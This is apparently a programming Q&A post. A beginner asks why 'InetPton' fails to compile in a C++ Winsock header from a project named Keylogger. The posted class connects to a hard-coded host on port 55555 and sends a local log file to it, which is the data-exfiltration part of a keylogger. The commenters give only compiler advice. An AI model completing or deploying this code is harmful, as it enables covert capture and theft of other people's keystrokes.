# error: 'InetPton' was not declared in this scope while compiling c++

Tags: c++, g++

I'm new to c++ and when I try to compile the code, I get the following:

> In file included from C:\Users\Toqa\Documents\Keylogger\main.cpp:10:
> C:\Users\Toqa\Documents\Keylogger\SendData.h: In constructor
> 'Data::Data()': C:\Users\Toqa\Documents\Keylogger\SendData.h:34:13:
> error: 'InetPton' was not declared in this scope InetPton(AF_INET,
> "172.0.0.1", &addr.sin_addr.s_addr); ^~~~~~~~
> C:\Users\Toqa\Documents\Keylogger\SendData.h:34:13: note: suggested
> alternative: 'inet_ntoa' InetPton(AF_INET, "172.0.0.1",
> &addr.sin_addr.s_addr); ^~~~~~~~ inet_ntoa

This is my code:

```
#ifndef SENDDATA_H
#define SENDDATA_H

#include <winsock2.h>
#include <ws2tcpip.h>

#include "IO.h"

#include<iostream>
#include<fstream>
#include<stdio.h>
#include <unistd.h>
#include <stdlib.h>

class Data{
    std::fstream file;

    int general_socket_descriptor;

    struct sockaddr_in address;
    int address_length;

    WSADATA wsa_data;
    SOCKADDR_IN addr;

    int server;

    public:
        Data(){
            create_socket();

            InetPton(AF_INET, "172.0.0.1", &addr.sin_addr.s_addr);

            addr.sin_family = AF_INET;
            addr.sin_port = htons(55555);

            create_connection();

            std::string path = IO::GetOurPath(true);


            file.open(path + "test.txt", std::ios::in | std::ios::binary);
            if(file.is_open()){
                std::cout<<"[LOG] : File Ready...\n";
            }
            else{
                std::cout<<"[ERROR] : File creation failed, Exiting.\n";
            }
        }

        void create_socket(){
            WSAStartup(MAKEWORD(2, 0), &wsa_data);

            if (server = socket(AF_INET, SOCK_STREAM, 0)) {
                std::cout<<"[LOG] : Socket Created Successfully.\n";
            }
            else{
                perror("[ERROR] : Socket failed.\n");
            }

        }

        void create_connection(){


            if (connect(server, reinterpret_cast<SOCKADDR *>(&addr), sizeof(addr)) < 0) {
                perror("[ERROR] : connection attempt failed.\n");
            }
            std::cout<<"[LOG] : Connection Successfull.\n";
        }

        void transmit_file(){
            std::string contents((std::istreambuf_iterator<char>(file)), std::istreambuf_iterator<char>());
            std::cout<<"[LOG] : Transmission Data Size "<<contents.length()<<" Bytes.\n";

            std::cout<<"[LOG] : Sending...\n";

            int bytes_sent = send(server , contents.c_str() , contents.length() , 0 );
            std::cout<<"data: "<<contents.c_str()<<"\n end \n";
            std::cout<<"[LOG] : Transmitted Data Size "<<bytes_sent<<" Bytes.\n";

            std::cout<<"[LOG] : File Transfer Complete.\n";

        }

};

#endif // SENDDATA_H
```

I'm using code blocks IDE on windows and this is the command of compiling:
g++.exe  -o bin\Debug\Test.exe obj\Debug\main.o  -mwindows  -lws2_32

The version is:
g++ (x86_64-posix-seh-rev0, Built by MinGW-W64 project) 8.1.0

After researching the error, most of the solutions were ensuring to link it with ws2_32. However, I'm using it and I still get the same error.

Comment: ***After researching the error, most of the solutions were ensuring to link it with ws2_32.*** This is not a linker error. Its a compiler error.

Comment: Use `inet_pton` for the ANSI version. https://learn.microsoft.com/en-us/windows/win32/api/ws2tcpip/nf-ws2tcpip-inet_pton

Comment: I still get the same error: 'inet_pton' was not declared in this scope

Comment: `#include <ws2tcpip.h>` is supposed to take care of that. Are you sure this is the exact same code and you are getting the error message on your constructor for your `Data()` class?

Comment: yes, this is why I'm so confused. It worked fine on another host, when I changed the host I faced this error, so I'm not sure what is the cause.